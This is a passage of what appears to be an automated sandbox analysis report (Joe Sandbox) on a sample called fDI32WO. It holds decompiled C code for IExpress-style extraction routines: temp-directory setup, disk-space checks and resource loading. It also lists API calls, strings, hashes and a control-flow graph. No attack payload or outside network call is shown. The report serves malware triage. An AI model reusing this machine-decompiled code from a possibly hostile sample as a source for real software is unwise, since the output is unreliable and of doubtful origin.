                                                                                                                                                                                                                                              																					_t59 = E00A85467(0xa891e4, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t59;
                                                                                                                                                                                                                                              																					if(_t59 != 0) {
                                                                                                                                                                                                                                              																						goto L45;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t60 = _v268;
                                                                                                                                                                                                                                              																						goto L42;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                              																					_v265 = 0;
                                                                                                                                                                                                                                              																					_v268 = _t60;
                                                                                                                                                                                                                                              																					goto L42;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				_t65 = E00A82630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t65;
                                                                                                                                                                                                                                              																				if(_t65 != 0) {
                                                                                                                                                                                                                                              																					goto L28;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t67 = E00A8597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t67;
                                                                                                                                                                                                                                              																					if(_t67 == 0) {
                                                                                                                                                                                                                                              																						goto L28;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						goto L33;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			goto L28;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L22;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L47;
                                                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                                                              												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                              											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										goto L43;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t101 = 1;
                                                                                                                                                                                                                                              										_t69 = E00A85467(0xa891e4, 1, 3); // executed
                                                                                                                                                                                                                                              										__eflags = _t69;
                                                                                                                                                                                                                                              										if(_t69 != 0) {
                                                                                                                                                                                                                                              											goto L45;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t82 = 0xa891e4;
                                                                                                                                                                                                                                              											_t70 = E00A82630(0, 0xa891e4, 1);
                                                                                                                                                                                                                                              											__eflags = _t70;
                                                                                                                                                                                                                                              											if(_t70 != 0) {
                                                                                                                                                                                                                                              												goto L19;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t101 = 1;
                                                                                                                                                                                                                                              												_t82 = 0xa891e4;
                                                                                                                                                                                                                                              												_t71 = E00A85467(0xa891e4, 1, 1);
                                                                                                                                                                                                                                              												__eflags = _t71;
                                                                                                                                                                                                                                              												if(_t71 != 0) {
                                                                                                                                                                                                                                              													goto L45;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													do {
                                                                                                                                                                                                                                              														goto L19;
                                                                                                                                                                                                                                              														L43:
                                                                                                                                                                                                                                              														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              														_push(4);
                                                                                                                                                                                                                                              														_t101 = 3;
                                                                                                                                                                                                                                              														_t82 =  &_v268;
                                                                                                                                                                                                                                              														_t44 = E00A8597D(_t82, _t101, 1);
                                                                                                                                                                                                                                              														__eflags = _t44;
                                                                                                                                                                                                                                              													} while (_t44 != 0);
                                                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                              							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								_t72 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0xa88b3f - _t35; // 0x0
                                                                                                                                                                                                                                              								_t72 = 0;
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t101 = 0;
                                                                                                                                                                                                                                              							_t73 = E00A85467(0xa88b3e, 0, _t72);
                                                                                                                                                                                                                                              							__eflags = _t73;
                                                                                                                                                                                                                                              							if(_t73 != 0) {
                                                                                                                                                                                                                                              								L45:
                                                                                                                                                                                                                                              								_t38 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t101 = 0x4be;
                                                                                                                                                                                                                                              								E00A844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L2;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t101 = 0x4b1;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t101 = 0x4b5;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					_t38 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L47:
                                                                                                                                                                                                                                              				return E00A86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x00a855ab
                                                                                                                                                                                                                                              0x00a855b2
                                                                                                                                                                                                                                              0x00a855c9
                                                                                                                                                                                                                                              0x00a855d5
                                                                                                                                                                                                                                              0x00a855d9
                                                                                                                                                                                                                                              0x00a85600
                                                                                                                                                                                                                                              0x00a85605
                                                                                                                                                                                                                                              0x00a8560a
                                                                                                                                                                                                                                              0x00a8560c
                                                                                                                                                                                                                                              0x00a85638
                                                                                                                                                                                                                                              0x00a85641
                                                                                                                                                                                                                                              0x00a85643
                                                                                                                                                                                                                                              0x00a85645
                                                                                                                                                                                                                                              0x00a85645
                                                                                                                                                                                                                                              0x00a8564c
                                                                                                                                                                                                                                              0x00a85652
                                                                                                                                                                                                                                              0x00a85657
                                                                                                                                                                                                                                              0x00a85659
                                                                                                                                                                                                                                              0x00a85696
                                                                                                                                                                                                                                              0x00a8569c
                                                                                                                                                                                                                                              0x00a8589f
                                                                                                                                                                                                                                              0x00a858a7
                                                                                                                                                                                                                                              0x00a858ac
                                                                                                                                                                                                                                              0x00a858b3
                                                                                                                                                                                                                                              0x00a858b5
                                                                                                                                                                                                                                              0x00a856a2
                                                                                                                                                                                                                                              0x00a856a2
                                                                                                                                                                                                                                              0x00a856a8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856ae
                                                                                                                                                                                                                                              0x00a856ae
                                                                                                                                                                                                                                              0x00a856b9
                                                                                                                                                                                                                                              0x00a856bf
                                                                                                                                                                                                                                              0x00a856c1
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00a85705
                                                                                                                                                                                                                                              0x00a8570a
                                                                                                                                                                                                                                              0x00a85711
                                                                                                                                                                                                                                              0x00a85717
                                                                                                                                                                                                                                              0x00a85724
                                                                                                                                                                                                                                              0x00a85726
                                                                                                                                                                                                                                              0x00a85729
                                                                                                                                                                                                                                              0x00a85730
                                                                                                                                                                                                                                              0x00a85737
                                                                                                                                                                                                                                              0x00a8573d
                                                                                                                                                                                                                                              0x00a85740
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8572b
                                                                                                                                                                                                                                              0x00a8572b
                                                                                                                                                                                                                                              0x00a8572e
                                                                                                                                                                                                                                              0x00a85742
                                                                                                                                                                                                                                              0x00a85742
                                                                                                                                                                                                                                              0x00a85745
                                                                                                                                                                                                                                              0x00a8576b
                                                                                                                                                                                                                                              0x00a8576b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85747
                                                                                                                                                                                                                                              0x00a85747
                                                                                                                                                                                                                                              0x00a8574d
                                                                                                                                                                                                                                              0x00a8574f
                                                                                                                                                                                                                                              0x00a85771
                                                                                                                                                                                                                                              0x00a85771
                                                                                                                                                                                                                                              0x00a85773
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85751
                                                                                                                                                                                                                                              0x00a85751
                                                                                                                                                                                                                                              0x00a85753
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85755
                                                                                                                                                                                                                                              0x00a8575b
                                                                                                                                                                                                                                              0x00a85760
                                                                                                                                                                                                                                              0x00a85762
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85764
                                                                                                                                                                                                                                              0x00a85764
                                                                                                                                                                                                                                              0x00a85769
                                                                                                                                                                                                                                              0x00a8577e
                                                                                                                                                                                                                                              0x00a8577e
                                                                                                                                                                                                                                              0x00a85781
                                                                                                                                                                                                                                              0x00a85788
                                                                                                                                                                                                                                              0x00a8578d
                                                                                                                                                                                                                                              0x00a8578f
                                                                                                                                                                                                                                              0x00a857b2
                                                                                                                                                                                                                                              0x00a857b8
                                                                                                                                                                                                                                              0x00a857bd
                                                                                                                                                                                                                                              0x00a857bf
                                                                                                                                                                                                                                              0x00a857cd
                                                                                                                                                                                                                                              0x00a857cd
                                                                                                                                                                                                                                              0x00a857dd
                                                                                                                                                                                                                                              0x00a857e3
                                                                                                                                                                                                                                              0x00a857ef
                                                                                                                                                                                                                                              0x00a857f5
                                                                                                                                                                                                                                              0x00a857f8
                                                                                                                                                                                                                                              0x00a8580a
                                                                                                                                                                                                                                              0x00a8580a
                                                                                                                                                                                                                                              0x00a857fa
                                                                                                                                                                                                                                              0x00a85802
                                                                                                                                                                                                                                              0x00a85802
                                                                                                                                                                                                                                              0x00a8580d
                                                                                                                                                                                                                                              0x00a8580f
                                                                                                                                                                                                                                              0x00a85830
                                                                                                                                                                                                                                              0x00a85836
                                                                                                                                                                                                                                              0x00a8583d
                                                                                                                                                                                                                                              0x00a8584b
                                                                                                                                                                                                                                              0x00a85851
                                                                                                                                                                                                                                              0x00a85855
                                                                                                                                                                                                                                              0x00a8585a
                                                                                                                                                                                                                                              0x00a8585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00a85811
                                                                                                                                                                                                                                              0x00a85817
                                                                                                                                                                                                                                              0x00a85819
                                                                                                                                                                                                                                              0x00a8581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8581f
                                                                                                                                                                                                                                              0x00a85791
                                                                                                                                                                                                                                              0x00a85797
                                                                                                                                                                                                                                              0x00a8579c
                                                                                                                                                                                                                                              0x00a8579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a857a0
                                                                                                                                                                                                                                              0x00a857a9
                                                                                                                                                                                                                                              0x00a857ae
                                                                                                                                                                                                                                              0x00a857b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a857b0
                                                                                                                                                                                                                                              0x00a8579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85769
                                                                                                                                                                                                                                              0x00a85762
                                                                                                                                                                                                                                              0x00a85753
                                                                                                                                                                                                                                              0x00a8574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856c3
                                                                                                                                                                                                                                              0x00a856c5
                                                                                                                                                                                                                                              0x00a856c9
                                                                                                                                                                                                                                              0x00a856ce
                                                                                                                                                                                                                                              0x00a856d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856d6
                                                                                                                                                                                                                                              0x00a856d6
                                                                                                                                                                                                                                              0x00a856d8
                                                                                                                                                                                                                                              0x00a856dd
                                                                                                                                                                                                                                              0x00a856df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856e1
                                                                                                                                                                                                                                              0x00a856e2
                                                                                                                                                                                                                                              0x00a856e4
                                                                                                                                                                                                                                              0x00a856e6
                                                                                                                                                                                                                                              0x00a856eb
                                                                                                                                                                                                                                              0x00a856ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8586c
                                                                                                                                                                                                                                              0x00a85878
                                                                                                                                                                                                                                              0x00a8587e
                                                                                                                                                                                                                                              0x00a85882
                                                                                                                                                                                                                                              0x00a85883
                                                                                                                                                                                                                                              0x00a85889
                                                                                                                                                                                                                                              0x00a8588e
                                                                                                                                                                                                                                              0x00a8588e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85896
                                                                                                                                                                                                                                              0x00a856ed
                                                                                                                                                                                                                                              0x00a856df
                                                                                                                                                                                                                                              0x00a856d0
                                                                                                                                                                                                                                              0x00a856c1
                                                                                                                                                                                                                                              0x00a856a8
                                                                                                                                                                                                                                              0x00a8565b
                                                                                                                                                                                                                                              0x00a8565b
                                                                                                                                                                                                                                              0x00a8565d
                                                                                                                                                                                                                                              0x00a85669
                                                                                                                                                                                                                                              0x00a85669
                                                                                                                                                                                                                                              0x00a8565f
                                                                                                                                                                                                                                              0x00a8565f
                                                                                                                                                                                                                                              0x00a85665
                                                                                                                                                                                                                                              0x00a85667
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85667
                                                                                                                                                                                                                                              0x00a8566c
                                                                                                                                                                                                                                              0x00a85673
                                                                                                                                                                                                                                              0x00a85678
                                                                                                                                                                                                                                              0x00a8567a
                                                                                                                                                                                                                                              0x00a8589b
                                                                                                                                                                                                                                              0x00a8589b
                                                                                                                                                                                                                                              0x00a85680
                                                                                                                                                                                                                                              0x00a85685
                                                                                                                                                                                                                                              0x00a8568c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8568c
                                                                                                                                                                                                                                              0x00a8567a
                                                                                                                                                                                                                                              0x00a8560e
                                                                                                                                                                                                                                              0x00a85613
                                                                                                                                                                                                                                              0x00a8561a
                                                                                                                                                                                                                                              0x00a85620
                                                                                                                                                                                                                                              0x00a85626
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85626
                                                                                                                                                                                                                                              0x00a855db
                                                                                                                                                                                                                                              0x00a855e0
                                                                                                                                                                                                                                              0x00a855e7
                                                                                                                                                                                                                                              0x00a855f1
                                                                                                                                                                                                                                              0x00a855f6
                                                                                                                                                                                                                                              0x00a855f6
                                                                                                                                                                                                                                              0x00a855f6
                                                                                                                                                                                                                                              0x00a858b7
                                                                                                                                                                                                                                              0x00a858c7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A855CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A85638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A8564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A85620
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A856B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A8571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A85737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A857CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A857EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A85802
                                                                                                                                                                                                                                                • Part of subcall function 00A82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A82654
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A85830
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A85878
                                                                                                                                                                                                                                                • Part of subcall function 00A8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A859A8
                                                                                                                                                                                                                                                • Part of subcall function 00A8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A859AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-2610921595
                                                                                                                                                                                                                                              • Opcode ID: 1f6f0516f16dcf53755823739df435335ba5555f23358bb6885847770d2752b1
                                                                                                                                                                                                                                              • Instruction ID: e765b586cefe4e66154880dc499cf66c3b7f7ca6122c3feb16d3427229257ab7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f6f0516f16dcf53755823739df435335ba5555f23358bb6885847770d2752b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1812570E04A059BEB24BBB08D85BFE76ADAF60340F5404A6FD86D2191EF748DC28B50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 324 a8597d-a859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a859bb-a859d8 call a844b9 call a86285 324->325 326 a859dd-a85a1b GetDiskFreeSpaceA 324->326 343 a85c05-a85c14 call a86ce0 325->343 328 a85ba1-a85bde memset call a86285 GetLastError FormatMessageA 326->328 329 a85a21-a85a4a MulDiv 326->329 339 a85be3-a85bfc call a844b9 SetCurrentDirectoryA 328->339 329->328 332 a85a50-a85a6c GetVolumeInformationA 329->332 335 a85a6e-a85ab0 memset call a86285 GetLastError FormatMessageA 332->335 336 a85ab5-a85aca SetCurrentDirectoryA 332->336 335->339 337 a85acc-a85ad1 336->337 341 a85ae2-a85ae4 337->341 342 a85ad3-a85ad8 337->342 351 a85c02 339->351 349 a85ae6 341->349 350 a85ae7-a85af8 341->350 342->341 347 a85ada-a85ae0 342->347 347->337 347->341 349->350 353 a85af9-a85afb 350->353 354 a85c04 351->354 355 a85afd-a85b03 353->355 356 a85b05-a85b08 353->356 354->343 355->353 355->356 357 a85b0a-a85b1b call a844b9 356->357 358 a85b20-a85b27 356->358 357->351 360 a85b29-a85b33 358->360 361 a85b52-a85b5b 358->361 360->361 364 a85b35-a85b50 360->364 362 a85b62-a85b6d 361->362 365 a85b6f-a85b74 362->365 366 a85b76-a85b7d 362->366 364->362 367 a85b85 365->367 368 a85b7f-a85b81 366->368 369 a85b83 366->369 370 a85b96-a85b9f 367->370 371 a85b87-a85b94 call a8268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E00A8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                                                                              				unsigned int _t103;
                                                                                                                                                                                                                                              				unsigned int _t105;
                                                                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                                                                              				long _t112;
                                                                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				signed int _t119;
                                                                                                                                                                                                                                              				signed int _t120;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t114 = __edi;
                                                                                                                                                                                                                                              				_t46 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                              				_v804 = __edx;
                                                                                                                                                                                                                                              				_t118 = __ecx;
                                                                                                                                                                                                                                              				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                              				if(_t50 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					_v796 = 0;
                                                                                                                                                                                                                                              					_v792 = 0;
                                                                                                                                                                                                                                              					_v800 = 0;
                                                                                                                                                                                                                                              					_v808 = 0;
                                                                                                                                                                                                                                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                              					__eflags = _t55;
                                                                                                                                                                                                                                              					if(_t55 == 0) {
                                                                                                                                                                                                                                              						L29:
                                                                                                                                                                                                                                              						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              						 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              						_t110 = 0x4b0;
                                                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						E00A844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                                                              						_t66 = 0;
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						L32:
                                                                                                                                                                                                                                              						_pop(_t114);
                                                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                              					_v812 = _t69;
                                                                                                                                                                                                                                              					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                              					__eflags = _t116;
                                                                                                                                                                                                                                              					if(_t116 == 0) {
                                                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                              					__eflags = _t73;
                                                                                                                                                                                                                                              					if(_t73 != 0) {
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                              						_t101 =  &_v16;
                                                                                                                                                                                                                                              						_t111 = 6;
                                                                                                                                                                                                                                              						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                              							__eflags = _t22;
                                                                                                                                                                                                                                              							if(_t22 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *_t101 = _t87;
                                                                                                                                                                                                                                              							_t101 = _t101 + 1;
                                                                                                                                                                                                                                              							_t111 = _t111 - 1;
                                                                                                                                                                                                                                              							__eflags = _t111;
                                                                                                                                                                                                                                              							if(_t111 != 0) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
